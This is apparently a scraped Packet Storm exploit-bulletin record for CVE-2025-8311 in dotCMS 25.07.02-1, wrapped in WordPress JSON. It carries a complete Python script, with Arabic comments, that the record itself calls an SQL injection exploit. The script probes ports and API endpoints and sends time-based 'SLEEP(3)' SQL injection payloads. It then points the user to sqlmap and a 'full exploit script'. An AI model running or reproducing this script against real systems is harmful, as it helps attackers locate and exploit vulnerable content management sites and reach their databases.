{“lastseen”:”2025-12-15T16:52:54″,”description”:”dotCMS version 25.07.02-1 python scanning script that looks for remote SQL injection…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 25.07.02-1 Security Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212820″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8311″],”sourceData”:”=============================================================================================================================================\\n | # Title : dotCMS 25.07.02-1 Security Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.dotcms.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211125\/ \\u0026 \\tCVE-2025-8311\\n \\n [+] Summary : This python script represents a sophisticated dual-method SQL Injection exploit targeting DotCMS content management systems. \\n \\n \\t\\n [+] Usage : * : Save as: poc.py\\n Run : python poc.py\\n \\t\\n [+] POC :\\t\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n dotCMS SQL Injection Scanner \\n \\”\\”\\”\\n \\n import sys\\n import time\\n import socket\\n import requests\\n import argparse\\n from urllib.parse import urlparse\\n \\n requests.packages.urllib3.disable_warnings()\\n \\n class SimpleDotCMSScanner:\\n def __init__(self, target):\\n self.target = target\\n self.session = requests.Session()\\n self.session.verify = False\\n self.session.timeout = 10\\n \\n # \u0642\u0627\u0626\u0645\u0629 \u0628\u0627\u0644\u0645\u0646\u0627\u0641\u0630 \u0627\u0644\u0634\u0627\u0626\u0639\u0629 \u0644\u0640dotCMS\\n self.common_ports = [8443, 8080, 80, 443, 8081, 8082, 8888]\\n \\n # \u0642\u0627\u0626\u0645\u0629 \u0628\u0640subdomains \u0645\u062d\u062a\u0645\u0644\u0629\\n self.common_subdomains = [\\n \\”demo\\”, \\”test\\”, \\”dev\\”, \\”staging\\”, \\n \\”admin\\”, \\”portal\\”, \\”cms\\”, \\”dotcms\\”\\n ]\\n \\n # \u0642\u0627\u0626\u0645\u0629 \u0628\u0640paths \u0634\u0627\u0626\u0639\u0629\\n self.common_paths = [\\n \\”\/\\”, \\”\/dotAdmin\/\\”, \\”\/html\/\\”, \\”\/c\/\\”, \\n \\”\/api\/v1\/\\”, \\”\/api\/\\”, \\”\/application\/\\”,\\n \\”\/admin\/\\”, \\”\/login\\”, \\”\/signin\\”\\n ]\\n \\n def test_port(self, host, port):\\n \\”\\”\\”\u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0646\u0641\u0630 \u0645\u0641\u062a\u0648\u062d\u0627\u064b\\”\\”\\”\\n try:\\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n sock.settimeout(3)\\n result = sock.connect_ex((host, port))\\n sock.close()\\n return result == 0\\n except:\\n return False\\n \\n def discover_dotcms(self):\\n \\”\\”\\”\u0627\u0643\u062a\u0634\u0627\u0641 \u0625\u0639\u062f\u0627\u062f dotCMS\\”\\”\\”\\n print(\\”\\\\n\ud83d\udd0d Discovering dotCMS configuration…\\”)\\n \\n # \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0647\u062f\u0641\\n target = self.target.lower().strip()\\n \\n results = {\\n \\”host\\”: \\”\\”,\\n \\”port\\”: None,\\n \\”protocol\\”: \\”https\\”,\\n \\”base_url\\”: \\”\\”,\\n \\”accessible\\”: False\\n }\\n \\n # \u062a\u062c\u0632\u0626\u0629 \u0627\u0644\u0647\u062f\u0641\\n if \\”:\/\/\\” in target:\\n parsed = urlparse(target)\\n host = parsed.netloc\\n if \\”:\\” in host:\\n host, port = host.split(\\”:\\”, 1)\\n port = int(port)\\n else:\\n port = None\\n else:\\n host = target\\n port = None\\n \\n # \u0625\u0632\u0627\u0644\u0629 www \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u0648\u062c\u0648\u062f\u0627\u064b\\n if host.startswith(\\”www.\\”):\\n host = host[4:]\\n \\n results[\\”host\\”] = host\\n \\n # \u062a\u062d\u062f\u064a\u062f \u0627\u0644\u0645\u0646\u0641\u0630\\n if port:\\n results[\\”port\\”] = port\\n else:\\n # \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0645\u0646\u0627\u0641\u0630 \u0627\u0644\u0634\u0627\u0626\u0639\u0629\\n for port in self.common_ports:\\n if self.test_port(host, port):\\n print(f\\” \u2713 Port {port} is open\\”)\\n results[\\”port\\”] = port\\n break\\n \\n if not results[\\”port\\”]:\\n print(\\” \u2717 No open ports found\\”)\\n return results\\n \\n # \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644\u0627\u062a\\n protocols = [\\”https\\”, \\”http\\”]\\n for protocol in protocols:\\n base_url = f\\”{protocol}:\/\/{host}:{results[‘port’]}\\”\\n \\n # \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644\\n for path in self.common_paths[:3]: # \u0623\u0648\u0644 3 \u0641\u0642\u0637 \u0644\u0644\u0633\u0631\u0639\u0629\\n url = base_url + path\\n try:\\n response = self.session.get(url, timeout=5)\\n if response.status_code \\u003c 500:\\n print(f\\” \u2713 {protocol.upper()} accessible at {url}\\”)\\n results[\\”protocol\\”] = protocol\\n results[\\”base_url\\”] = base_url\\n results[\\”accessible\\”] = True\\n \\n # \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f dotCMS\\n if \\”dotcms\\” in response.text.lower():\\n print(f\\” \u2713 dotCMS detected!\\”)\\n elif \\”dotadmin\\” in response.text.lower():\\n print(f\\” \u2713 dotAdmin detected!\\”)\\n \\n return results\\n except Exception as e:\\n continue\\n \\n return results\\n \\n def find_public_apis(self, base_url):\\n \\”\\”\\”\u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0648\u0627\u062c\u0647\u0627\u062a API \u0639\u0627\u0645\u0629\\”\\”\\”\\n print(\\”\\\\n\ud83d\udd0e Searching for public APIs…\\”)\\n \\n api_endpoints = [\\n \\”\/api\/v1\/system\/status\\”,\\n \\”\/api\/v1\/version\\”,\\n \\”\/api\/v1\/sites\\”,\\n \\”\/api\/v1\/content\\”,\\n \\”\/api\/v1\/nav\\”,\\n \\”\/api\/v1\/menu\\”,\\n \\”\/api\/v1\/widgets\\”,\\n \\”\/api\/v1\/containers\\”,\\n \\”\/api\/v1\/templates\\”\\n ]\\n \\n found_apis = []\\n \\n for endpoint in api_endpoints:\\n url = base_url + endpoint\\n try:\\n response = self.session.get(url, timeout=5)\\n \\n if response.status_code == 200:\\n print(f\\” \u2713 Public API: {endpoint}\\”)\\n found_apis.append({\\n \\”url\\”: url,\\n \\”status\\”: response.status_code,\\n \\”content_type\\”: response.headers.get(‘Content-Type’, ”),\\n \\”size\\”: len(response.content)\\n })\\n elif response.status_code in [401, 403]:\\n print(f\\” ! Protected API: {endpoint} (Auth required)\\”)\\n elif response.status_code == 404:\\n pass # \u0644\u0627 \u062a\u0639\u0631\u0636 \u0627\u0644\u0640404\\n else:\\n print(f\\” ? API: {endpoint} (Status: {response.status_code})\\”)\\n \\n except Exception as e:\\n pass\\n \\n return found_apis\\n \\n def quick_sqli_test(self, api_url):\\n \\”\\”\\”\u0627\u062e\u062a\u0628\u0627\u0631 \u0633\u0631\u064a\u0639 \u0644\u0640SQL Injection\\”\\”\\”\\n print(f\\”\\\\n\u26a1 Quick SQLi test on: {api_url}\\”)\\n \\n # \u0627\u062e\u062a\u0628\u0627\u0631 \u0628\u0633\u064a\u0637 \u0644\u0640Time-based SQLi\\n test_params = [\\”filter\\”, \\”orderby\\”, \\”sort\\”, \\”id\\”, \\”type\\”]\\n \\n for param in test_params:\\n test_url = f\\”{api_url}?{param}=test\\”\\n \\n # \u0628\u0627\u064a\u0644\u0648\u062f Time-based\\n payloads = [\\n \\”‘ AND SLEEP(3)–\\”,\\n \\”‘ OR (SELECT 1 FROM (SELECT SLEEP(3))a)–\\”,\\n \\”‘) AND SLEEP(3)–\\”\\n ]\\n \\n for payload in payloads:\\n full_url = test_url + payload\\n try:\\n start = time.time()\\n response = self.session.get(full_url, timeout=10)\\n elapsed = time.time() – start\\n \\n if elapsed \\u003e= 3:\\n print(f\\” \ud83d\udea8 POSSIBLE TIME-BASED SQLi in parameter: {param}\\”)\\n print(f\\” Payload: {payload}\\”)\\n print(f\\” Response time: {elapsed:.2f}s\\”)\\n return True\\n \\n except requests.exceptions.Timeout:\\n print(f\\” \ud83d\udea8 TIMEOUT – Possible SQLi in parameter: {param}\\”)\\n return True\\n except:\\n pass\\n \\n print(\\” \u2713 No obvious SQLi detected\\”)\\n return False\\n \\n def scan(self):\\n \\”\\”\\”\u0627\u0644\u0645\u0633\u062d \u0627\u0644\u0631\u0626\u064a\u0633\u064a\\”\\”\\”\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”dotCMS Security Scanner\\”)\\n print(\\”=\\”*60)\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u0644\u0627\u0643\u062a\u0634\u0627\u0641\\n config = self.discover_dotcms()\\n \\n if not config[\\”accessible\\”]:\\n print(\\”\\\\n\u274c Cannot access the target\\”)\\n print(\\”\\\\n\ud83d\udca1 Try these alternatives:\\”)\\n print(\\” 1. python scanner.py localhost:8443\\”)\\n print(\\” 2. python scanner.py 127.0.0.1:8080\\”)\\n print(\\” 3. python scanner.py your-domain.com\\”)\\n return\\n \\n print(f\\”\\\\n\u2705 Target found:\\”)\\n print(f\\” Host: {config[‘host’]}\\”)\\n print(f\\” Port: {config[‘port’]}\\”)\\n print(f\\” Protocol: {config[‘protocol’]}\\”)\\n print(f\\” Base URL: {config[‘base_url’]}\\”)\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0644\u0628\u062d\u062b \u0639\u0646 APIs\\n apis = self.find_public_apis(config[\\”base_url\\”])\\n \\n if not apis:\\n print(\\”\\\\n\u26a0\ufe0f No public APIs found\\”)\\n print(\\”\\\\n\ud83c\udfaf Try these common endpoints:\\”)\\n for path in self.common_paths:\\n print(f\\” {config[‘base_url’]}{path}\\”)\\n return\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u062e\u062a\u0628\u0627\u0631 SQLi \u0639\u0644\u0649 \u0643\u0644 API\\n sql_vulnerabilities = []\\n for api in apis:\\n if self.quick_sqli_test(api[\\”url\\”]):\\n sql_vulnerabilities.append(api[\\”url\\”])\\n \\n # \u0639\u0631\u0636 \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”SCAN RESULTS\\”)\\n print(\\”=\\”*60)\\n \\n print(f\\”\\\\n\ud83d\udcca Summary:\\”)\\n print(f\\” Total APIs found: {len(apis)}\\”)\\n print(f\\” Possible SQLi vulnerabilities: {len(sql_vulnerabilities)}\\”)\\n \\n if sql_vulnerabilities:\\n print(f\\”\\\\n\ud83d\udea8 Vulnerable endpoints:\\”)\\n for vuln in sql_vulnerabilities:\\n print(f\\” \u2022 {vuln}\\”)\\n \\n print(f\\”\\\\n\ud83d\udca1 Next steps:\\”)\\n print(f\\” 1. Test manually with sqlmap: sqlmap -u \\\\\\”{sql_vulnerabilities[0]}\\\\\\”\\”)\\n print(f\\” 2. Use the full exploit script with authentication token\\”)\\n print(f\\” 3. Check for authentication bypass methods\\”)\\n else:\\n print(f\\”\\\\n\u2705 No SQL injection vulnerabilities found in public APIs\\”)\\n print(f\\”\\\\n\ud83d\udca1 Try authenticated endpoints if you have credentials\\”)\\n \\n def main():\\n parser = argparse.ArgumentParser(description=\\”Simple dotCMS Security Scanner\\”)\\n parser.add_argument(\\”target\\”, help=\\”Target (e.g., demo.dotcms.com, localhost:8443)\\”)\\n \\n args = parser.parse_args()\\n \\n print(r\\”\\”\\”\\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n dotCMS Security Scanner \\n \\”\\”\\”)\\n \\n scanner = SimpleDotCMSScanner(args.target)\\n scanner.scan()\\n \\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(\\”\\\\n\\\\n[!] Scan interrupted by user\\”)\\n sys.exit(0)\\n except Exception as e:\\n print(f\\”\\\\n[!] Error: {e}\\”)\\n sys.exit(1)\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212820″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212820\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-15T16:52:54″,”description”:”dotCMS version 25.07.02-1 python scanning script that looks for remote SQL injection…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 25.07.02-1 Security Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212820″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8311″],”sourceData”:”=============================================================================================================================================\\n | # Title : dotCMS 25.07.02-1 Security Scanner |\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-31170","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n